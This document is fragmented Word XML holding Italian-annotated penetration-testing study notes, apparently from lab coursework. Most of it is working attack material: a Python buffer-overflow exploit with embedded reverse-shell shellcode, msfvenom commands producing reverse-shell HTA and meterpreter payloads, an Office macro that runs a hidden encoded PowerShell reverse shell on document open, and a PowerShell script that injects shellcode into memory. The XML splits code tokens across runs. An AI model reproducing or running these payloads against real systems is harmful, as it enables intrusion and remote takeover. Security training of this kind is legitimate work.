        <w:t xml:space="preserve">socket</w:t>
        <w:tab/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host</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"10.11.0.128"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nop_sled</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x90"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">8</w:t>
        <w:tab/>
        <w:t xml:space="preserve">#</w:t>
        <w:tab/>
        <w:t xml:space="preserve">NOP</w:t>
        <w:tab/>
        <w:t xml:space="preserve">sled</w:t>
        <w:tab/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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">msfvenom</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-p</w:t>
        <w:tab/>
        <w:t xml:space="preserve">linux/x86/shell_reverse_tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">LHOST=10.11.0.4</w:t>
        <w:tab/>
        <w:t xml:space="preserve">LPORT=443</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-b</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x00\x20"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-f</w:t>
        <w:tab/>
        <w:t xml:space="preserve">p</w:t>
        <w:tab/>
        <w:t xml:space="preserve">y</w:t>
        <w:tab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shellcode</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">""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shellcode</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\xbe\x35\x9e\xa3\x7d\xd9\xe8\xd9\x74\x24\xf4\x5a\x29"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">shellcode</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/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"\xc9\xb1\x12\x31\x72\x12\x83\xc2\x04\x03\x47\x90\x41"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">shellcode</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/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"\x88\x96\x77\x72\x90\x8b\xc4\x2e\x3d\x29\x42\x31\x71"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">shellcode</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab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"\x4b\x99\x32\xe1\xca\x91\x0c\xcb\x6c\x98\x0b\x2a\x04"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">shellcode</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/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"\xb7\xfc\xb8\x46\xaf\xfe\x40\x67\x8b\x76\xa1\xd7\x8d"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">shellcode</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/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"\xd8\x73\x44\xe1\xda\xfa\x8b\xc8\x5d\xae\x23\xbd\x72"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">shellcode</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/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"\x3c\xdb\x29\xa2\xed\x79\xc3\x35\x12\x2f\x40\xcf\x34"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">shellcode</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x7f\x6d\x02\x36"</w:t>
        <w:tab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padding</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x41"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">*</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(4368</w:t>
        <w:tab/>
        <w:t xml:space="preserve">- len(nop_sled)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">- len(shellcode))</w:t>
        <w:tab/>
        <w:t xml:space="preserve">eip</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x96\x45\x13\x08"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">#</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x08134596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first_stage</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x83\xc0\x0c\xff\xe0\x90\x90"</w:t>
        <w:tab/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buffer</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\x11(setup</w:t>
        <w:tab/>
        <w:t xml:space="preserve">sound</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">nop_sled</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">shellcode</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">padding</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">eip</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">first_stage</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"\ x90\x00#"</w:t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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket.socket(socket.AF_INET,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">socket.SOCK_STREAM)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">print</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"[*]Sending</w:t>
        <w:tab/>
        <w:t xml:space="preserve">evil</w:t>
        <w:tab/>
        <w:t xml:space="preserve">buffer..."</w:t>
        <w:tab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s.connect((host,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">13327))</w:t>
        <w:tab/>
        <w:t xml:space="preserve">print</w:t>
        <w:tab/>
        <w:t xml:space="preserve">s.recv(1024)</w:t>
        <w:tab/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s.send(buffer)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">s.close()</w:t>
        <w:tab/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"[*]Payload</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Sent</w:t>
        <w:tab/>
        <w:t xml:space="preserve">!"</w:t>
        <w:tab/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kali@kali sudo nc -lnvp 443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HTA Attack in Action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sudo msfvenom -p windows/shell_reverse_tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">LHOST=10.11.0.4</w:t>
        <w:tab/>
        <w:t xml:space="preserve">LPORT=4444 -f hta-psh -o</w:t>
        <w:tab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/var/www/html/evil.hta</w:t>
        <w:tab/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sudo cat /var/www/html/evil.hta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\\script in VB per lanciare il cmd attraverso la macro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Sub</w:t>
        <w:tab/>
        <w:t xml:space="preserve">MyMacro()</w:t>
        <w:tab/>
        <w:t xml:space="preserve">CreateObject("Wscript.Shell").Run</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"cmd"</w:t>
        <w:tab/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End</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Sub</w:t>
        <w:tab/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Sub</w:t>
        <w:tab/>
        <w:t xml:space="preserve">AutoOpen()</w:t>
        <w:tab/>
        <w:t xml:space="preserve">MyMacro</w:t>
        <w:tab/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End</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Sub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Sub</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Document_Open()</w:t>
        <w:tab/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MyMacro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End</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Sub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Sub</w:t>
        <w:tab/>
        <w:t xml:space="preserve">MyMacro()</w:t>
        <w:tab/>
        <w:t xml:space="preserve">CreateObject("Wscript.Shell").Run</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"cmd"</w:t>
        <w:tab/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End</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Sub</w:t>
        <w:tab/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\\scirpt in VB per avviare una reverse shell attraverso PS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Sub</w:t>
        <w:tab/>
        <w:t xml:space="preserve">AutoOpen()</w:t>
        <w:tab/>
        <w:t xml:space="preserve">MyMacro</w:t>
        <w:tab/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End</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Sub</w:t>
        <w:tab/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Sub</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Document_Open()</w:t>
        <w:tab/>
        <w:t xml:space="preserve">MyMacro</w:t>
        <w:tab/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End</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Sub</w:t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Sub</w:t>
        <w:tab/>
        <w:t xml:space="preserve">MyMacro()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Dim</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">As</w:t>
        <w:tab/>
        <w:t xml:space="preserve">String</w:t>
        <w:tab/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Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"powershell.exe</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-nop</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-w</w:t>
        <w:tab/>
        <w:t xml:space="preserve">hidden</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-e</w:t>
        <w:tab/>
        <w:t xml:space="preserve">JABzACAAPQAgAE4AZ"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Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/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"TAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6A"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/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"EYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEg"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/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"ANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATAAxAFgANgAyACsAY"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/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"gBTAEIARAAvAG4ARQBqADUASAAvAGgAZwBDAFoAQwBJAFoAUgB"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">...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Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"AZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0Ac"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/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"AByAGUAcwBzACkADQAKACQAcwB0AHIAZQBhAG0AIAA9ACAATgB"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/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"lAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtA"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab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"FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/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"AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">+</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"QA="</w:t>
        <w:tab/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CreateObject("Wscript.Shell").Run</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Str</w:t>
        <w:tab/>
        <w:t xml:space="preserve">End</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Sub</w:t>
        <w:tab/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kali@kali$ nc -lnvp 4444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C:\Users\Offsec&gt;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kali@kali$ searchsploit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(scova se ci sono exploit)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ad esempio tipo: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kali@kali$ searchsploit "Sync Breeze Enterprise 10.0.0.28"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--Fixing Web Exploit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base_url = "http://192.168.1.10/csmms/admin"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base_url = "https://10.11.0.128/admin"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poi modificare nel file del response aggiungere verify False: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response</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">requests.post(url,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">data=data,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">allow_redirects=False,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">verify=False)</w:t>
        <w:tab/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response</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">requests.post(url,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">data=data,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">files=txt,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">cookies=cookies,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">verify=False)</w:t>
        <w:tab/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response</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">requests.post(url,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">data=data,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">cookies=cookies,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">allow_redirects=False,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">v</w:t>
        <w:tab/>
        <w:t xml:space="preserve">erify=False)</w:t>
        <w:tab/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username = "admin" password = "password"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*modificare credenziali*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Packers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malware che offuscano il codice lo coprono.. ed è possibile scoprirlo attraverso reverse engineering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Remote Process Memory Injection (la più famosa anche chiamata Powershell Injection)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questo malware crea nuove sezioni o cambia sezioni intere di permessi.. questa tecnica è incentrata principalmente la manipolazione della memoria volatile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l' OpenProcess ottiene un valid HANDLE per mirare al processo dove abbiamo i permessi. Dopo aver ottenuto HANDLE lo allocheremo nella memoria e nel contesto del processo. All' interno del processo inseriremo il payload e otterremo l'accesso del processo e lo applichiamo utilizzando un altro nuovo processo chiamando un API come VirtualAllocEX ed una volta alllocato ed eseguito possiamo separare il thread usando CreateRemoteThread API (WriteProcessMemory)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Reflective DLL Injection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attraverso un DLL usando LoadLibrary API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Process Hollowing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attaccanti prima lanciano un processo non malevolo in sospeso. poi lanciano l'imaggine del processo è rimuovono dalla memoria e rimpiazzato con un executable image malevolo.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Inline hooking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tecnica che modifica la memoria e introduce hook (instruzione che redirige l'esecuzione del codice) nella funzione e la punta il flusso di esecuzione verso il malware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C:\Users\offsec\Desktop&gt; binary.exe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//script powershell per il payload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$code</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'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[DllImport("kernel32.dll")]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public</w:t>
        <w:tab/>
        <w:t xml:space="preserve">static</w:t>
        <w:tab/>
        <w:t xml:space="preserve">extern</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">VirtualAlloc(IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpAddress,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">dwSize,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">flAllocat</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ionType,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">flProtect);</w:t>
        <w:tab/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[DllImport("kernel32.dll")]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public</w:t>
        <w:tab/>
        <w:t xml:space="preserve">static</w:t>
        <w:tab/>
        <w:t xml:space="preserve">extern</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">CreateThread(IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpThreadAttributes,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">dwStackSize,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpStartAddress,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpParameter,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/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dwCreationFlags,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpThreadId);</w:t>
        <w:tab/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[DllImport("msvcrt.dll")]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public</w:t>
        <w:tab/>
        <w:t xml:space="preserve">static</w:t>
        <w:tab/>
        <w:t xml:space="preserve">extern</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">memset(IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">dest,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">src,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">count);';</w:t>
        <w:tab/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$winFunc</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=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Add-Type</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-memberDefinition</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$code -Name</w:t>
        <w:tab/>
        <w:t xml:space="preserve">"Win32"</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-namespace</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Win32Functions</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-passthru;</w:t>
        <w:tab/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[Byte[]];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[Byte[]]$sc</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">&lt;place</w:t>
        <w:tab/>
        <w:t xml:space="preserve">your</w:t>
        <w:tab/>
        <w:t xml:space="preserve">shellcode</w:t>
        <w:tab/>
        <w:t xml:space="preserve">here&gt;;</w:t>
        <w:tab/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$size</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x1000;</w:t>
        <w:tab/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if</w:t>
        <w:tab/>
        <w:t xml:space="preserve">($sc.Length</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-gt</w:t>
        <w:tab/>
        <w:t xml:space="preserve">0x1000)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">{$size</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$sc.Length};</w:t>
        <w:tab/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$x</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$winFunc::VirtualAlloc(0,$size,0x3000,0x40);</w:t>
        <w:tab/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for</w:t>
        <w:tab/>
        <w:t xml:space="preserve">($i=0;$i</w:t>
        <w:tab/>
        <w:t xml:space="preserve">-le</w:t>
        <w:tab/>
        <w:t xml:space="preserve">($sc.Length-1);$i++)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">{$winFunc::memset([IntPtr]($x.ToInt32()+$i),</w:t>
        <w:tab/>
        <w:t xml:space="preserve">$sc</w:t>
        <w:tab/>
        <w:t xml:space="preserve">[$i],</w:t>
        <w:tab/>
        <w:t xml:space="preserve">1)};</w:t>
        <w:tab/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$winFunc::CreateThread(0,0,$x,0,0,0);for</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(;;)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">{</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Start-sleep</w:t>
        <w:tab/>
        <w:t xml:space="preserve">60</w:t>
        <w:tab/>
        <w:t xml:space="preserve">};</w:t>
        <w:tab/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\\importare le Windows API su Powershell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[DllImport("kernel32.dll")]</w:t>
        <w:tab/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public</w:t>
        <w:tab/>
        <w:t xml:space="preserve">static</w:t>
        <w:tab/>
        <w:t xml:space="preserve">extern</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">VirtualAlloc(IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpAddress,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">dwSize,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">flAllocat</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ionType,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">flProtect);</w:t>
        <w:tab/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[DllImport("kernel32.dll")]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public</w:t>
        <w:tab/>
        <w:t xml:space="preserve">static</w:t>
        <w:tab/>
        <w:t xml:space="preserve">extern</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">CreateThread(IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpThreadAttributes,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">dwStackSize,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpStartAddress,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpParameter,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/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dwCreationFlags,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpThreadId);</w:t>
        <w:tab/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[DllImport("msvcrt.dll")]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public</w:t>
        <w:tab/>
        <w:t xml:space="preserve">static</w:t>
        <w:tab/>
        <w:t xml:space="preserve">extern</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">memset(IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">dest,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">src,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">count);';</w:t>
        <w:tab/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\\Allocazione della memoria e payload scritto attraverso Windows API in Powershell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[DllImport("kernel32.dll")]</w:t>
        <w:tab/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public</w:t>
        <w:tab/>
        <w:t xml:space="preserve">static</w:t>
        <w:tab/>
        <w:t xml:space="preserve">extern</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">VirtualAlloc(IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpAddress,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">dwSize,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">flAllocat</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ionType,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">flProtect);</w:t>
        <w:tab/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[DllImport("kernel32.dll")]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public</w:t>
        <w:tab/>
        <w:t xml:space="preserve">static</w:t>
        <w:tab/>
        <w:t xml:space="preserve">extern</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">CreateThread(IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpThreadAttributes,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">dwStackSize,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpStartAddress,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpParameter,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/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dwCreationFlags,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpThreadId);</w:t>
        <w:tab/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[DllImport("msvcrt.dll")]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public</w:t>
        <w:tab/>
        <w:t xml:space="preserve">static</w:t>
        <w:tab/>
        <w:t xml:space="preserve">extern</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">memset(IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">dest,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">src,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">count);';</w:t>
        <w:tab/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\\Calling the payload using CreateThread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$winFunc::CreateThread(0,0,$x,0,0,0);for</w:t>
        <w:tab/>
        <w:t xml:space="preserve">(;;)</w:t>
        <w:tab/>
        <w:t xml:space="preserve">{</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Start-sleep</w:t>
        <w:tab/>
        <w:t xml:space="preserve">60</w:t>
        <w:tab/>
        <w:t xml:space="preserve">};</w:t>
        <w:tab/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kali@kali$ msfvenom </w:t>
        <w:tab/>
        <w:t xml:space="preserve">-p windows/meterpreter/reverse_tcp</w:t>
        <w:tab/>
        <w:t xml:space="preserve">LHOST=10.11.0.4</w:t>
        <w:tab/>
        <w:t xml:space="preserve">LPORT=4444 -f powershell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\\script finale per il memory injection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$code</w:t>
        <w:tab/>
        <w:t xml:space="preserve">=</w:t>
        <w:tab/>
        <w:t xml:space="preserve">'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[DllImport("kernel32.dll")]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public</w:t>
        <w:tab/>
        <w:t xml:space="preserve">static</w:t>
        <w:tab/>
        <w:t xml:space="preserve">extern</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">VirtualAlloc(IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpAddress,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">dwSize,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">flAllocat</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ionType,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">flProtect);</w:t>
        <w:tab/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[DllImport("kernel32.dll")]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public</w:t>
        <w:tab/>
        <w:t xml:space="preserve">static</w:t>
        <w:tab/>
        <w:t xml:space="preserve">extern</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">CreateThread(IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpThreadAttributes,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/>
        <w:t xml:space="preserve">dwStackSize,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpStartAddress,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpParameter,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">uint</w:t>
        <w:tab/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dwCreationFlags,</w:t>
        <w:tab/>
        <w:t xml:space="preserve">IntPtr</w:t>
        <w:tab/>
        <w:t xml:space="preserve">lpThreadId);</w:t>
